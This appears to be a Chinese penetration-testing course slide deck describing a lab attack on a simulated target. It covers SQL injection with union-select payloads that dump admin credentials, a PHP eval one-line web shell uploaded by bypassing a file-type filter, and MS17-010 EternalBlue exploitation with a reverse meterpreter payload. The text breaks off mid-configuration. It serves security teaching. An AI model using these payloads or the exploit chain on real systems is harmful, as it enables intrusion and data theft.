滲透測試技術(shù)-教學(xué)課件 第七章滲透測試綜合實驗一

第七章滲透測試綜合實驗一目錄CONTENTS01實驗概述02實驗過程03實驗總結(jié)實驗概述PART.01實驗概述本實驗環(huán)境為模擬真實網(wǎng)絡(luò)環(huán)境搭建的漏洞靶場。模擬攻擊者先通過信息收集，獲取目標網(wǎng)站的漏洞信息，然后利用各種技術(shù)手段，對網(wǎng)站漏洞進行攻擊和利用，從而入侵Web服務(wù)器，獲取網(wǎng)站的控制權(quán)限。為進一步提升控制權(quán)限，攻擊者利用服務(wù)器系統(tǒng)漏洞實施滲透與后滲透攻擊，創(chuàng)建管理員用戶，并遠程登錄主機系統(tǒng)，從而達到獲取目標主機最高權(quán)限的目的。模擬外網(wǎng)攻擊，對目標服務(wù)器進行完整的滲透測試實驗拓撲實驗拓撲可以分為兩大區(qū)域，分別是攻擊者區(qū)域和服務(wù)器區(qū)域。實驗環(huán)境及實驗工具1.實驗環(huán)境（1）VMwareWorkstationPro虛擬機環(huán)境（15.1.0build-13591040或以上）。（2）Kali-linux-2022（攻擊機IP地址：81）。（3）WindowsServer2016（攻擊機IP地址：96）。（4）Windows732位（靶機IP地址：/24）。2.實驗工具DirsearchNmapAWVSMetasploitNessusBurp

Suite蟻劍火狐瀏覽器滲透版谷歌瀏覽器實驗過程PART.02實驗過程——1.信息收集知識回顧（1）Nmap的ping掃描與全掃描技術(shù)（2）Nmap掃描結(jié)果的分析方法（3）AWVS的使用（4）AWVS掃描結(jié)果的分析方法（5）手動SQL注入檢測方法（6）基本SQL語句的使用01通過nmap掃描工具，獲取同一網(wǎng)段有哪些主機處于存活狀態(tài)。1.信息收集——滲透步驟執(zhí)行命令：nmap-sP/2401通過nmap掃描工具，獲取同一網(wǎng)段有哪些主機處于存活狀態(tài)。1.信息收集——滲透步驟

靶機確認03打開火狐瀏覽器滲透版，輸入“21”，訪問靶機網(wǎng)站1.信息收集——滲透步驟05建立掃描目標，選擇“FullScan”選項，等待掃描完成1.信息收集——滲透步驟06在導(dǎo)航欄中選擇“Vulnerabilities”選項，查看威脅詳情，在威脅列表中勾選要查看的漏洞，單擊查看漏洞詳情。1.信息收集——滲透步驟07對網(wǎng)站進行手動檢測。在一般情況下，網(wǎng)站URL如果存在?Id、?S等符號，就說明存在注入漏洞。然而，一般存在這些符號的URL都是網(wǎng)站的新聞頁面、產(chǎn)品頁面等。因此，在靶場的網(wǎng)站中（21）查找相關(guān)頁面，如新聞動態(tài)等。1.信息收集——滲透步驟任意選中其中一條新聞，如“如何讓App的用戶數(shù)快速增長?”，發(fā)現(xiàn)此新聞的URL為21/index.php?s=/news/6，接著嘗試對此URL進行手動SQL注入檢測。1.信息收集——滲透步驟08添加單引號并執(zhí)行1.信息收集——滲透步驟報錯信息09添加“and1=1”，構(gòu)造語句“21/index.php?s=/news/6and1=1”。1.信息收集——滲透步驟10添加“and1=2”，構(gòu)造語句“21/index.php?s=/news/6and1=2”。1.信息收集——滲透步驟分析結(jié)果：通過添加“and1=1”，發(fā)現(xiàn)網(wǎng)站返回正常頁面（返回頁面與沒有添加“and1=1”的一致），而添加“and1=2”后，網(wǎng)站頁面返回異常（返回頁面跳轉(zhuǎn)到首頁）。1.信息收集——滲透結(jié)果靶場網(wǎng)站存在SQL注入漏洞。網(wǎng)站注入點在21/index.php?s=/news/6中實驗過程——2.SQL注入（1）手動SQL注入方法（2）基本的MySQL語句與常用函數(shù)（3）Base64編碼方法（4）網(wǎng)站敏感目錄掃描知識回顧01構(gòu)造語句，判斷字段數(shù)。構(gòu)造語句“21/index.php?s=/news/6)orderby12--”。2.SQL注入——滲透步驟頁面出現(xiàn)錯誤，根據(jù)報錯信息可以知道，字段數(shù)少于12個。02采用折中猜測法，猜測字段數(shù)為6個，此時需要將12改為6，構(gòu)造語句“21/index.php?s=/news/6)orderby6--”2.SQL注入——滲透步驟返回正常，說明字段數(shù)大于或等于6個。當字段數(shù)等于7時，頁面顯示正常。當字段數(shù)等于8時，頁面報錯，說明字段數(shù)等于7。2.SQL注入——滲透步驟03進行聯(lián)合查詢，確定回顯位置。構(gòu)造語句“21/index.php?s=/news/-6)unionselect1,2,3,4,5,6,7--”，發(fā)現(xiàn)2、7為回顯位置。2.SQL注入——滲透步驟04在回顯位置輸入version()和database()，獲取數(shù)據(jù)庫版本號和數(shù)據(jù)庫名字。構(gòu)造語句“21/index.php?s=/news/-6)unionselect1,version(),3,4,5,6,database()--”。2.SQL注入——滲透步驟數(shù)據(jù)庫名字為tpx，數(shù)據(jù)庫版本號為5.5.11。05繼續(xù)獲取數(shù)據(jù)庫tpx的表名。構(gòu)造語句“21/index.php?s=/news/-6)unionselect1,2,3,4,5,6,group_concat(distincttable_name)frominformation_schema.columnswhere(table_schema='tpx')--2.SQL注入——滲透步驟06獲取表tpx_admin_user的字段名。構(gòu)造語句“21/index.php?s=/news/-6)unionselect1,2,3,4,5,6,group_concat(distinctcolumn_name)frominformation_schema.columnswhere(table_name='tpx_admin_user')2.SQL注入——滲透步驟2.SQL注入——滲透步驟數(shù)據(jù)庫中的表名tpx_admin_accesstpx_admin_nodetpx_admin_roletpx_admin_usertpx_cms_newstpx_cms_partnertpx_cms_producttpx_cms_product_cattpx_cms_single_pagepx_cms_slidetpx_cms_tag_pooltpx_configtpx_data_filestpx_admin_role_user數(shù)據(jù)庫中的字段名idusernamepasswordpassword_saltreg_timereg_ip,last_login_timelast_login_iplast_change_pwd_timestatus分析發(fā)現(xiàn)：最有可能存放賬號和密碼的字段為username和password。07獲取字段username和password中的內(nèi)容。構(gòu)造語句“http://192.168.100.121/index.php?s=/news/-6)unionselect1,username,3,4,5,6,passwordfromtpx_admin_user--2.SQL注入——滲透步驟賬號為admin，密碼為VFZSSmVrNUVWVEpaYlhneFdsRTlQUT0908對密碼進行Base64解密。打開BurpSuite，進入“Decoder”選項卡，進行Base64解密。2.SQL注入——滲透步驟初步判斷密碼為123456blue09查找網(wǎng)站登錄頁面的路徑：使用Kali中的Dirsearch進行掃描，獲取網(wǎng)站敏感目錄。進入/root/dirsearch目錄，執(zhí)行命令：pythondirsearch.py-u21-ephp

2.SQL注入——滲透步驟2.SQL注入——滲透步驟掃描結(jié)果：訪問21/admin.php會重定向到21/admin.php?s=/system/info2.SQL注入——滲透步驟訪問此鏈接，發(fā)現(xiàn)其為登錄頁面。10使用已獲取的賬號admin和密碼123456blue登錄網(wǎng)站。2.SQL注入——滲透結(jié)果登錄失敗。分析：可能是密碼錯誤。猜測密碼會不會只進行了一次或兩次的Base64加密，而不是三次。因此，嘗試使用MTIzNDU2Ymx1ZQ==和TVRJek5EVTJZbXgxWlE9PQ==作為密碼進行登錄。2.SQL注入——滲透結(jié)果使用賬號admin和Base64一次解密結(jié)果MTIzNDU2Ymx1ZQ==進行登錄，登錄成功。實驗過程——3.文件上傳繞過（1）一句話木馬（2）文件類型上傳繞過（3）使用BurpSuite抓包改包（4）使用蟻劍知識回顧3.文件上傳繞過——滲透步驟01上傳木馬文件，獲取網(wǎng)站Shell。上傳木馬文件需要尋找網(wǎng)站上傳文件的路徑。單擊“網(wǎng)站內(nèi)容”→“新聞動態(tài)”→“添加”按鈕。3.文件上傳繞過——滲透步驟02制作一句話木馬<?php@eval($_POST['pass']);?>，將文件命名為test.php03嘗試將木馬文件test.php上傳到后臺，發(fā)現(xiàn)上傳文件的后綴名被限制。3.文件上傳繞過——滲透步驟04通過BurpSuite進行抓包，將URL中的image修改為php，進行繞過。修改完成后，單擊“Forward”按鈕轉(zhuǎn)發(fā)數(shù)據(jù)包，上傳到網(wǎng)站后臺3.文件上傳繞過——滲透步驟05在當前頁面右擊，在彈出的快捷菜單中選擇“查看頁面信息”命令。3.文件上傳繞過——滲透步驟在彈出的對話框中選擇“媒體”選項，發(fā)現(xiàn)上傳的test.php木馬文件的路徑是21/_RUN/Data/test.php。3.文件上傳繞過——滲透步驟06打開瀏覽器，訪問21/_RUN/Data/test.php，頁面出現(xiàn)空白，證明木馬文件上傳并解析成功。分析：為什么頁面顯示空白可以證明一句話木馬被解析了？3.文件上傳繞過——滲透結(jié)果01打開蟻劍并右擊，在彈出的快捷菜單中選擇“添加數(shù)據(jù)”命令，彈出“添加數(shù)據(jù)”對話框，添加木馬位置和密碼。3.文件上傳繞過——滲透結(jié)果02雙擊URL地址，進入網(wǎng)站Shell終端，在“test.php”選項上右擊，在彈出的快捷菜單中選擇“在此處打開終端”命令。3.文件上傳繞過——滲透結(jié)果03進入終端，輸入命令whoami，查看身份權(quán)限，發(fā)現(xiàn)ntauthority\iusr為普通用戶，權(quán)限過低。04嘗試創(chuàng)建一個新用戶aaa，執(zhí)行命令“netuseraaa1234.com/add”，由于權(quán)限過低，被拒絕。實驗過程——4.權(quán)限提升（1）Nessus的使用（2）Nessus掃描結(jié)果分析（3）MS17-010漏洞的利用（4）Metasploit的應(yīng)用知識回顧4.權(quán)限提升——滲透步驟01利用系統(tǒng)漏洞進行提權(quán)，先使用Nessus對靶機進行系統(tǒng)掃描。打開谷歌瀏覽器，訪問https://localhost:8834，輸入賬號和密碼進行登錄。4.權(quán)限提升——滲透步驟02選擇“AdvancedScan”選項，在“Targets”文本框中輸入IP地址，創(chuàng)建新掃描。選中創(chuàng)建的掃描，進行掃描，等待掃描結(jié)束。4.權(quán)限提升——滲透步驟03掃描結(jié)束后，進入“Vulnerabilities”頁面，對掃描結(jié)果進行分析。單擊相關(guān)漏洞，查看漏洞詳情。4.權(quán)限提升——滲透步驟04選擇MS17-010漏洞進行利用。打開Kali，進入/root目錄，查看系統(tǒng)漏洞利用模塊。05將deps和eternalblue_doublepulsar.rb兩個文件復(fù)制到MSF的模塊目錄。4.權(quán)限提升——滲透步驟再切換到/usr/share/metasploit-framework/modules/exploits/windows/smb/目錄下，查看deps和eternalblue_doublepulsar.rb兩個文件。4.權(quán)限提升——滲透步驟06更新Kali的apt源并下載、安裝wine32。執(zhí)行命令：“dpkg--add-architecturei386&&apt-getupdate&&apt-getinstallwine32:i386”4.權(quán)限提升——滲透步驟07通過wine執(zhí)行exp.exe腳本。4.權(quán)限提升——滲透步驟08開啟PostgreSQL數(shù)據(jù)庫服務(wù)，進入MSFconsole4.權(quán)限提升——滲透步驟查詢MS17-010漏洞可利用的模塊，發(fā)現(xiàn)都是針對64位操作系統(tǒng)的，對32位操作系統(tǒng)無效。09利用剛加入的模塊eternalblue_doublepulsar，執(zhí)行命令“useexploit/windows/smb/eternalblue_doublepulsar”，設(shè)置漏洞利用腳本4.權(quán)限提升——滲透步驟10配置攻擊載荷，執(zhí)行命令“setpayloadwindows/meterpreter/reverse_tcp”；查看配置選項信息，執(zhí)行命令“showoptions”。4.權(quán)限提升——滲透步驟11對參數(shù)進行配置。4.權(quán)限提升——滲透步驟其中，DOUBLEPULSARPATH、ETERNALBLUEPATH、processinject、R